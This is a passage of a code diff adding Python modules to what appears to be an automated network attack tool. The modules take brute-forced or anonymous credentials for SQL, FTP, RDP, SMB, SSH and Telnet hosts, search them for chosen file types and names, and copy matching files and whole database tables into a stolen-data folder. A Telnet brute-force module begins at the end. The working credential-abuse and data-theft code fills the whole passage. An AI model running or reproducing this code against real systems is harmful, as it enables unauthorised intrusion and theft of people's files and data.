return
query = f"SELECT * FROM {schema}.{table}"
df = pd.read_sql(query, engine)
local_file_path = os.path.join(local_dir, f"{schema}_{table}.csv")
df.to_csv(local_file_path, index=False)
logger.success(f"Downloaded data from table {schema}.{table} to {local_file_path}")
except Exception as e:
logger.error(f"Error downloading data from table {schema}.{table}: {e}")
def execute(self, ip, port, row, status_key):
"""
Steal data from the remote SQL server.
"""
try:
if 'success' in row.get(self.b_parent_action, ''):
self.shared_data.bjornorch_status = "StealDataSQL"
time.sleep(5)
logger.info(f"Stealing data from {ip}:{port}...")
sqlfile = self.shared_data.sqlfile
credentials = []
if os.path.exists(sqlfile):
df = pd.read_csv(sqlfile)
# Filtrer les credentials pour l'IP spécifique
ip_credentials = df[df['IP Address'] == ip]
# Créer des tuples (username, password, database)
credentials = [(row['User'], row['Password'], row['Database'])
for _, row in ip_credentials.iterrows()]
logger.info(f"Found {len(credentials)} credential combinations for {ip}")
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def timeout():
if not self.sql_connected:
logger.error(f"No SQL connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout)
timer.start()
success = False
for username, password, database in credentials:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Steal data execution interrupted.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip} on database {database}")
# D'abord se connecter sans base pour vérifier les permissions globales
engine = self.connect_sql(ip, username, password)
if engine:
tables = self.find_tables(engine)
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"sql/{mac}_{ip}/{database}")
os.makedirs(local_dir, exist_ok=True)
if tables:
for table, schema in tables:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
break
# Se connecter à la base spécifique pour le vol de données
db_engine = self.connect_sql(ip, username, password, schema)
if db_engine:
self.steal_data(db_engine, table, schema, local_dir)
success = True
counttables = len(tables)
logger.success(f"Successfully stolen data from {counttables} tables on {ip}:{port}")
if success:
timer.cancel()
return 'success'
except Exception as e:
logger.error(f"Error stealing data from {ip} with user '{username}' on database {database}: {e}")
if not success:
logger.error(f"Failed to steal any data from {ip}:{port}")
return 'failed'
else:
return 'success'
else:
logger.info(f"Skipping {ip} as it was not successfully bruteforced")
return 'skipped'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
def b_parent_action(self, row):
"""
Get the parent action status from the row.
"""
return row.get(b_parent, {}).get(b_status, '')
if __name__ == "__main__":
shared_data = SharedData()
try:
steal_data_sql = StealDataSQL(shared_data)
logger.info("[bold green]Starting SQL data extraction process[/bold green]")
# Load the IPs to process from shared data
ips_to_process = shared_data.read_data()
# Execute data theft on each IP
for row in ips_to_process:
ip = row["IPs"]
steal_data_sql.execute(ip, b_port, row, b_status)
except Exception as e:
logger.error(f"Error in main execution: {e}")

198
actions/steal_files_ftp.py Normal file
View File

@@ -0,0 +1,198 @@
"""
steal_files_ftp.py - This script connects to FTP servers using provided credentials or anonymous access, searches for specific files, and downloads them to a local directory.
"""
import os
import logging
import time
from rich.console import Console
from threading import Timer
from ftplib import FTP
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_ftp.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesFTP"
b_module = "steal_files_ftp"
b_status = "steal_files_ftp"
b_parent = "FTPBruteforce"
b_port = 21
class StealFilesFTP:
"""
Class to handle the process of stealing files from FTP servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.ftp_connected = False
self.stop_execution = False
logger.info("StealFilesFTP initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def connect_ftp(self, ip, username, password):
"""
Establish an FTP connection.
"""
try:
ftp = FTP()
ftp.connect(ip, 21)
ftp.login(user=username, passwd=password)
self.ftp_connected = True
logger.info(f"Connected to {ip} via FTP with username {username}")
return ftp
except Exception as e:
logger.error(f"FTP connection error for {ip} with user '{username}' and password '{password}': {e}")
return None
def find_files(self, ftp, dir_path):
"""
Find files in the FTP share based on the configuration criteria.
"""
files = []
try:
ftp.cwd(dir_path)
items = ftp.nlst()
for item in items:
try:
ftp.cwd(item)
files.extend(self.find_files(ftp, os.path.join(dir_path, item)))
ftp.cwd('..')
except Exception:
if any(item.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in item for file_name in self.shared_data.steal_file_names):
files.append(os.path.join(dir_path, item))
logger.info(f"Found {len(files)} matching files in {dir_path} on FTP")
except Exception as e:
logger.error(f"Error accessing path {dir_path} on FTP: {e}")
return files
def steal_file(self, ftp, remote_file, local_dir):
"""
Download a file from the FTP server to the local directory.
"""
try:
local_file_path = os.path.join(local_dir, os.path.relpath(remote_file, '/'))
local_file_dir = os.path.dirname(local_file_path)
os.makedirs(local_file_dir, exist_ok=True)
with open(local_file_path, 'wb') as f:
ftp.retrbinary(f'RETR {remote_file}', f.write)
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
except Exception as e:
logger.error(f"Error downloading file {remote_file} from FTP: {e}")
def execute(self, ip, port, row, status_key):
"""
Steal files from the FTP server.
"""
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesFTP"
logger.info(f"Stealing files from {ip}:{port}...")
# Wait a bit because it's too fast to see the status change
time.sleep(5)
# Get FTP credentials from the cracked passwords file
ftpfile = self.shared_data.ftpfile
credentials = []
if os.path.exists(ftpfile):
with open(ftpfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4])) # Username and password
logger.info(f"Found {len(credentials)} credentials for {ip}")
def try_anonymous_access():
"""
Try to access the FTP server without credentials.
"""
try:
ftp = self.connect_ftp(ip, 'anonymous', '')
return ftp
except Exception as e:
logger.info(f"Anonymous access to {ip} failed: {e}")
return None
if not credentials and not try_anonymous_access():
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def timeout():
"""
Timeout function to stop the execution if no FTP connection is established.
"""
if not self.ftp_connected:
logger.error(f"No FTP connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
# Attempt anonymous access first
success = False
ftp = try_anonymous_access()
if ftp:
remote_files = self.find_files(ftp, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"ftp/{mac}_{ip}/anonymous")
if remote_files:
for remote_file in remote_files:
if self.stop_execution:
break
self.steal_file(ftp, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} via anonymous access")
ftp.quit()
if success:
timer.cancel() # Cancel the timer if the operation is successful
# Attempt to steal files using each credential if anonymous access fails
for username, password in credentials:
if self.stop_execution:
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
ftp = self.connect_ftp(ip, username, password)
if ftp:
remote_files = self.find_files(ftp, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"ftp/{mac}_{ip}/{username}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution:
break
self.steal_file(ftp, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.info(f"Successfully stolen {countfiles} files from {ip}:{port} with user '{username}'")
ftp.quit()
if success:
timer.cancel() # Cancel the timer if the operation is successful
break # Exit the loop as we have found valid credentials
except Exception as e:
logger.error(f"Error stealing files from {ip} with user '{username}': {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
return 'success'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_ftp = StealFilesFTP(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

184
actions/steal_files_rdp.py Normal file
View File

@@ -0,0 +1,184 @@
"""
steal_files_rdp.py - This script connects to remote RDP servers using provided credentials, searches for specific files, and downloads them to a local directory.
"""
import os
import subprocess
import logging
import time
from threading import Timer
from rich.console import Console
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_rdp.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesRDP"
b_module = "steal_files_rdp"
b_status = "steal_files_rdp"
b_parent = "RDPBruteforce"
b_port = 3389
class StealFilesRDP:
"""
Class to handle the process of stealing files from RDP servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.rdp_connected = False
self.stop_execution = False
logger.info("StealFilesRDP initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def connect_rdp(self, ip, username, password):
"""
Establish an RDP connection.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("RDP connection attempt interrupted due to orchestrator exit.")
return None
command = f"xfreerdp /v:{ip} /u:{username} /p:{password} /drive:shared,/mnt/shared"
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if process.returncode == 0:
logger.info(f"Connected to {ip} via RDP with username {username}")
self.rdp_connected = True
return process
else:
logger.error(f"Error connecting to RDP on {ip} with username {username}: {stderr.decode()}")
return None
except Exception as e:
logger.error(f"Error connecting to RDP on {ip} with username {username}: {e}")
return None
def find_files(self, client, dir_path):
"""
Find files in the remote directory based on the configuration criteria.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted due to orchestrator exit.")
return []
# Assuming that files are mounted and can be accessed via SMB or locally
files = []
for root, dirs, filenames in os.walk(dir_path):
for file in filenames:
if any(file.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in file for file_name in self.shared_data.steal_file_names):
files.append(os.path.join(root, file))
logger.info(f"Found {len(files)} matching files in {dir_path}")
return files
except Exception as e:
logger.error(f"Error finding files in directory {dir_path}: {e}")
return []
def steal_file(self, remote_file, local_dir):
"""
Download a file from the remote server to the local directory.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
return
local_file_path = os.path.join(local_dir, os.path.basename(remote_file))
os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
command = f"cp {remote_file} {local_file_path}"
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if process.returncode == 0:
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
else:
logger.error(f"Error downloading file {remote_file}: {stderr.decode()}")
except Exception as e:
logger.error(f"Error stealing file {remote_file}: {e}")
def execute(self, ip, port, row, status_key):
"""
Steal files from the remote server using RDP.
"""
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesRDP"
# Wait a bit because it's too fast to see the status change
time.sleep(5)
logger.info(f"Stealing files from {ip}:{port}...")
# Get RDP credentials from the cracked passwords file
rdpfile = self.shared_data.rdpfile
credentials = []
if os.path.exists(rdpfile):
with open(rdpfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4]))
logger.info(f"Found {len(credentials)} credentials for {ip}")
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def timeout():
"""
Timeout function to stop the execution if no RDP connection is established.
"""
if not self.rdp_connected:
logger.error(f"No RDP connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
# Attempt to steal files using each credential
success = False
for username, password in credentials:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Steal files execution interrupted due to orchestrator exit.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
client = self.connect_rdp(ip, username, password)
if client:
remote_files = self.find_files(client, '/mnt/shared')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"rdp/{mac}_{ip}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
break
self.steal_file(remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} using {username}")
client.terminate()
if success:
timer.cancel() # Cancel the timer if the operation is successful
return 'success' # Return success if the operation is successful
except Exception as e:
logger.error(f"Error stealing files from {ip} with username {username}: {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
logger.error(f"Parent action not successful for {ip}. Skipping steal files action.")
return 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_rdp = StealFilesRDP(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

223
actions/steal_files_smb.py Normal file
View File

@@ -0,0 +1,223 @@
import os
import logging
from rich.console import Console
from threading import Timer
import time
from smb.SMBConnection import SMBConnection
from smb.base import SharedFile
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_smb.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesSMB"
b_module = "steal_files_smb"
b_status = "steal_files_smb"
b_parent = "SMBBruteforce"
b_port = 445
IGNORED_SHARES = {'print$', 'ADMIN$', 'IPC$', 'C$', 'D$', 'E$', 'F$', 'Sharename', '---------', 'SMB1'}
class StealFilesSMB:
"""
Class to handle the process of stealing files from SMB shares.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.smb_connected = False
self.stop_execution = False
logger.info("StealFilesSMB initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def connect_smb(self, ip, username, password):
"""
Establish an SMB connection.
"""
try:
conn = SMBConnection(username, password, "Bjorn", "Target", use_ntlm_v2=True, is_direct_tcp=True)
conn.connect(ip, 445)
logger.info(f"Connected to {ip} via SMB with username {username}")
self.smb_connected = True
return conn
except Exception as e:
logger.error(f"SMB connection error for {ip} with user '{username}' and password '{password}': {e}")
return None
def find_files(self, conn, share_name, dir_path):
"""
Find files in the SMB share based on the configuration criteria.
"""
files = []
try:
for file in conn.listPath(share_name, dir_path):
if file.isDirectory:
if file.filename not in ['.', '..']:
files.extend(self.find_files(conn, share_name, os.path.join(dir_path, file.filename)))
else:
if any(file.filename.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in file.filename for file_name in self.shared_data.steal_file_names):
files.append(os.path.join(dir_path, file.filename))
logger.info(f"Found {len(files)} matching files in {dir_path} on share {share_name}")
except Exception as e:
logger.error(f"Error accessing path {dir_path} in share {share_name}: {e}")
return files
def steal_file(self, conn, share_name, remote_file, local_dir):
"""
Download a file from the SMB share to the local directory.
"""
try:
local_file_path = os.path.join(local_dir, os.path.relpath(remote_file, '/'))
local_file_dir = os.path.dirname(local_file_path)
os.makedirs(local_file_dir, exist_ok=True)
with open(local_file_path, 'wb') as f:
conn.retrieveFile(share_name, remote_file, f)
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
except Exception as e:
logger.error(f"Error downloading file {remote_file} from share {share_name}: {e}")
def list_shares(self, conn):
"""
List shares using the SMBConnection object.
"""
try:
shares = conn.listShares()
valid_shares = [share for share in shares if share.name not in IGNORED_SHARES and not share.isSpecial and not share.isTemporary]
logger.info(f"Found valid shares: {[share.name for share in valid_shares]}")
return valid_shares
except Exception as e:
logger.error(f"Error listing shares: {e}")
return []
def execute(self, ip, port, row, status_key):
"""
Steal files from the SMB share.
"""
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesSMB"
logger.info(f"Stealing files from {ip}:{port}...")
# Wait a bit because it's too fast to see the status change
time.sleep(5)
# Get SMB credentials from the cracked passwords file
smbfile = self.shared_data.smbfile
credentials = {}
if os.path.exists(smbfile):
with open(smbfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
share = parts[3]
user = parts[4]
password = parts[5]
if share not in credentials:
credentials[share] = []
credentials[share].append((user, password))
logger.info(f"Found credentials for {len(credentials)} shares on {ip}")
def try_anonymous_access():
"""
Try to access SMB shares without credentials.
"""
try:
conn = self.connect_smb(ip, '', '')
shares = self.list_shares(conn)
return conn, shares
except Exception as e:
logger.info(f"Anonymous access to {ip} failed: {e}")
return None, None
if not credentials and not try_anonymous_access():
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def timeout():
"""
Timeout function to stop the execution if no SMB connection is established.
"""
if not self.smb_connected:
logger.error(f"No SMB connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
# Attempt anonymous access first
success = False
conn, shares = try_anonymous_access()
if conn and shares:
for share in shares:
if share.isSpecial or share.isTemporary or share.name in IGNORED_SHARES:
continue
remote_files = self.find_files(conn, share.name, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"smb/{mac}_{ip}/{share.name}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution:
break
self.steal_file(conn, share.name, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} via anonymous access")
conn.close()
if success:
timer.cancel() # Cancel the timer if the operation is successful
# Track which shares have already been accessed anonymously
attempted_shares = {share.name for share in shares} if success else set()
# Attempt to steal files using each credential for shares not accessed anonymously
for share, creds in credentials.items():
if share in attempted_shares or share in IGNORED_SHARES:
continue
for username, password in creds:
if self.stop_execution:
break
try:
logger.info(f"Trying credential {username}:{password} for share {share} on {ip}")
conn = self.connect_smb(ip, username, password)
if conn:
remote_files = self.find_files(conn, share, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"smb/{mac}_{ip}/{share}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution:
break
self.steal_file(conn, share, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.info(f"Successfully stolen {countfiles} files from {ip}:{port} on share '{share}' with user '{username}'")
conn.close()
if success:
timer.cancel() # Cancel the timer if the operation is successful
break # Exit the loop as we have found valid credentials
except Exception as e:
logger.error(f"Error stealing files from {ip} on share '{share}' with user '{username}': {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
return 'success'
else:
logger.error(f"Parent action not successful for {ip}. Skipping steal files action.")
return 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_smb = StealFilesSMB(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

173
actions/steal_files_ssh.py Normal file
View File

@@ -0,0 +1,173 @@
"""
steal_files_ssh.py - This script connects to remote SSH servers using provided credentials, searches for specific files, and downloads them to a local directory.
"""
import os
import paramiko
import logging
import time
from rich.console import Console
from threading import Timer
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_ssh.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesSSH"
b_module = "steal_files_ssh"
b_status = "steal_files_ssh"
b_parent = "SSHBruteforce"
b_port = 22
class StealFilesSSH:
"""
Class to handle the process of stealing files from SSH servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.sftp_connected = False
self.stop_execution = False
logger.info("StealFilesSSH initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def connect_ssh(self, ip, username, password):
"""
Establish an SSH connection.
"""
try:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(ip, username=username, password=password)
logger.info(f"Connected to {ip} via SSH with username {username}")
return ssh
except Exception as e:
logger.error(f"Error connecting to SSH on {ip} with username {username}: {e}")
raise
def find_files(self, ssh, dir_path):
"""
Find files in the remote directory based on the configuration criteria.
"""
try:
stdin, stdout, stderr = ssh.exec_command(f'find {dir_path} -type f')
files = stdout.read().decode().splitlines()
matching_files = []
for file in files:
if self.shared_data.orchestrator_should_exit :
logger.info("File search interrupted.")
return []
if any(file.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in file for file_name in self.shared_data.steal_file_names):
matching_files.append(file)
logger.info(f"Found {len(matching_files)} matching files in {dir_path}")
return matching_files
except Exception as e:
logger.error(f"Error finding files in directory {dir_path}: {e}")
raise
def steal_file(self, ssh, remote_file, local_dir):
"""
Download a file from the remote server to the local directory.
"""
try:
sftp = ssh.open_sftp()
self.sftp_connected = True # Mark SFTP as connected
remote_dir = os.path.dirname(remote_file)
local_file_dir = os.path.join(local_dir, os.path.relpath(remote_dir, '/'))
os.makedirs(local_file_dir, exist_ok=True)
local_file_path = os.path.join(local_file_dir, os.path.basename(remote_file))
sftp.get(remote_file, local_file_path)
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
sftp.close()
except Exception as e:
logger.error(f"Error stealing file {remote_file}: {e}")
raise
def execute(self, ip, port, row, status_key):
"""
Steal files from the remote server using SSH.
"""
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesSSH"
# Wait a bit because it's too fast to see the status change
time.sleep(5)
logger.info(f"Stealing files from {ip}:{port}...")
# Get SSH credentials from the cracked passwords file
sshfile = self.shared_data.sshfile
credentials = []
if os.path.exists(sshfile):
with open(sshfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4]))
logger.info(f"Found {len(credentials)} credentials for {ip}")
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def timeout():
"""
Timeout function to stop the execution if no SFTP connection is established.
"""
if not self.sftp_connected:
logger.error(f"No SFTP connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
# Attempt to steal files using each credential
success = False
for username, password in credentials:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
ssh = self.connect_ssh(ip, username, password)
remote_files = self.find_files(ssh, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"ssh/{mac}_{ip}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted.")
break
self.steal_file(ssh, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} using {username}")
ssh.close()
if success:
timer.cancel() # Cancel the timer if the operation is successful
return 'success' # Return success if the operation is successful
except Exception as e:
logger.error(f"Error stealing files from {ip} with username {username}: {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
logger.error(f"Parent action not successful for {ip}. Skipping steal files action.")
return 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_ssh = StealFilesSSH(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

View File

@@ -0,0 +1,180 @@
"""
steal_files_telnet.py - This script connects to remote Telnet servers using provided credentials, searches for specific files, and downloads them to a local directory.
"""
import os
import telnetlib
import logging
import time
from rich.console import Console
from threading import Timer
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_telnet.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesTelnet"
b_module = "steal_files_telnet"
b_status = "steal_files_telnet"
b_parent = "TelnetBruteforce"
b_port = 23
class StealFilesTelnet:
"""
Class to handle the process of stealing files from Telnet servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.telnet_connected = False
self.stop_execution = False
logger.info("StealFilesTelnet initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def connect_telnet(self, ip, username, password):
"""
Establish a Telnet connection.
"""
try:
tn = telnetlib.Telnet(ip)
tn.read_until(b"login: ")
tn.write(username.encode('ascii') + b"\n")
if password:
tn.read_until(b"Password: ")
tn.write(password.encode('ascii') + b"\n")
tn.read_until(b"$", timeout=10)
logger.info(f"Connected to {ip} via Telnet with username {username}")
return tn
except Exception as e:
logger.error(f"Telnet connection error for {ip} with user '{username}' & password '{password}': {e}")
return None
def find_files(self, tn, dir_path):
"""
Find files in the remote directory based on the config criteria.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted due to orchestrator exit.")
return []
tn.write(f'find {dir_path} -type f\n'.encode('ascii'))
files = tn.read_until(b"$", timeout=10).decode('ascii').splitlines()
matching_files = []
for file in files:
if self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted due to orchestrator exit.")
return []
if any(file.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in file for file_name in self.shared_data.steal_file_names):
matching_files.append(file.strip())
logger.info(f"Found {len(matching_files)} matching files in {dir_path}")
return matching_files
except Exception as e:
logger.error(f"Error finding files on Telnet: {e}")
return []
def steal_file(self, tn, remote_file, local_dir):
"""
Download a file from the remote server to the local directory.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
return
local_file_path = os.path.join(local_dir, os.path.relpath(remote_file, '/'))
local_file_dir = os.path.dirname(local_file_path)
os.makedirs(local_file_dir, exist_ok=True)
with open(local_file_path, 'wb') as f:
tn.write(f'cat {remote_file}\n'.encode('ascii'))
f.write(tn.read_until(b"$", timeout=10))
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
except Exception as e:
logger.error(f"Error downloading file {remote_file} from Telnet: {e}")
def execute(self, ip, port, row, status_key):
"""
Steal files from the remote server using Telnet.
"""
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesTelnet"
logger.info(f"Stealing files from {ip}:{port}...")
# Wait a bit because it's too fast to see the status change
time.sleep(5)
# Get Telnet credentials from the cracked passwords file
telnetfile = self.shared_data.telnetfile
credentials = []
if os.path.exists(telnetfile):
with open(telnetfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4]))
logger.info(f"Found {len(credentials)} credentials for {ip}")
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def timeout():
"""
Timeout function to stop the execution if no Telnet connection is established.
"""
if not self.telnet_connected:
logger.error(f"No Telnet connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
# Attempt to steal files using each credential
success = False
for username, password in credentials:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Steal files execution interrupted due to orchestrator exit.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
tn = self.connect_telnet(ip, username, password)
if tn:
remote_files = self.find_files(tn, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"telnet/{mac}_{ip}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
break
self.steal_file(tn, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} using {username}")
tn.close()
if success:
timer.cancel() # Cancel the timer if the operation is successful
return 'success' # Return success if the operation is successful
except Exception as e:
logger.error(f"Error stealing files from {ip} with user '{username}': {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
logger.error(f"Parent action not successful for {ip}. Skipping steal files action.")
return 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_telnet = StealFilesTelnet(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

206
actions/telnet_connector.py Normal file
View File

@@ -0,0 +1,206 @@
"""
telnet_connector.py - This script performs a brute-force attack on Telnet servers using a list of credentials,
and logs the successful login attempts.
"""
import os
import pandas as pd
import telnetlib
import threading
import logging
import time
from queue import Queue
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="telnet_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "TelnetBruteforce"
b_module = "telnet_connector"
b_status = "brute_force_telnet"
b_port = 23
b_parent = None
class TelnetBruteforce:
"""
Class to handle the brute-force attack process for Telnet servers.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.telnet_connector = TelnetConnector(shared_data)
logger.info("TelnetConnector initialized.")
def bruteforce_telnet(self, ip, port):
"""
Perform brute-force attack on a Telnet server.
"""
return self.telnet_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute-force attack.
"""
self.shared_data.bjornorch_status = "TelnetBruteforce"
success, results = self.bruteforce_telnet(ip, port)
return 'success' if success else 'failed'
class TelnetConnector:
"""
Class to handle Telnet connections and credential testing.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("23", na=False)]
